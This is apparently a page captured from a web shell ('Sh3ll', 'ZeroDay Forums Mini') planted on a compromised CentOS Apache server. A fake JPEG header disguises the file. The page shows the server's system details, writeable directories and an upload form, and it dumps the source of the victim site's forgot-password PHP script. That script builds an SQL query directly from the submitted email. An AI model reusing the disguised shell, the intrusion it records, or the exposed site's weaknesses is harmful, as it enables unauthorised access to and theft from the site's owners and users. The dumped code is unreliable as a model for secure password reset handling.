ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/luckymerchan/code/forgotpassword/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/luckymerchan/code/forgotpassword/list.php
<?php
$_SESSION['url_ref'] = $INFO['home_url'];
if(isset($_SERVER['HTTP_REFERER']) and strpos($_SERVER['HTTP_REFERER'],'login.html')===false and strpos($_SERVER['HTTP_REFERER'],'updatepassword.html')===false and strpos($_SERVER['HTTP_REFERER'],'logout.html')===false
    and strpos($_SERVER['HTTP_REFERER'],'register.html')===false and strpos($_SERVER['HTTP_REFERER'],'forgotpassword.html')===false
){
    $_SESSION['url_ref'] = $_SERVER['HTTP_REFERER'];
}
if(isset($CORE->input['submitbt'])) {
    $f = $CORE->input['f'];
    $email_user = trim($f['email']);
    if (filter_var($email_user, FILTER_VALIDATE_EMAIL)) {
        $row_check_email = $DB->fetch_row($DB->query("SELECT * FROM tb_user WHERE user_key='$email_user' "));
        if(!$row_check_email){
            header('Location: /?act=forgotpassword#'.$email_user);
        }else{
            if(!isset($_SESSION['auth_code_forgotpassword'][$email_user]) or  $_SESSION['auth_code_forgotpassword'][$email_user]=='') {
                $auth_code = $func->make_password(6);
                $_SESSION['auth_code_forgotpassword'][$email_user] = $auth_code;
                $fromname = $arr_option['blogname'];
                $subject = 'Auth code for your forgot password';
                $sub_subject = 'Please confirm this email address so you can update your password';
                $body = file_get_contents('layout/default/mail_tpl/auth_code.html');
                $html_body = '<p style="font-size: 15px; font-weight: bold; line-height: 140%; text-align: center; margin-bottom: 10px;">Hello ' . $email_user . '!</p>
                        <p style="font-size: 14px; line-height: 140%; text-align: center;">You (or someone else) used ' . trim($f['email']) . ' to retrieve password of your account at ' . $arr_option['blogname'] . '. If you don\'t forget your password, ignore this email;</p>
                        <p style="font-size: 14px; line-height: 140%; text-align: center;">Otherwise enter the following auth code to complete the password reset process:</p>';
                $logo = '<a href="'.$INFO['home_url'].'" target="_blank"><img src="'.$INFO['home_url'].$arr_option['logo_website'].'"></a>';
                $body = str_replace(array('{logo}','{body}', '{auth_code}', '{site_name}', '{site_des}'), array($logo,$html_body, $auth_code, $arr_option['blogname'], $arr_option['blogdescription']), $body);
                $arr_to = array(
                    array('Email' => trim($f['email']), 'Name' => $email_user)
                );
                send_mail($fromname, $subject, $sub_subject, $body, $arr_to);
            }
            $txt_email_user = str_replace('@','[]',$email_user);
            header('Location: /?act=forgotpassword#auth_code_input--'.$txt_email_user);

        }
    }
}

ZeroDay Forums Mini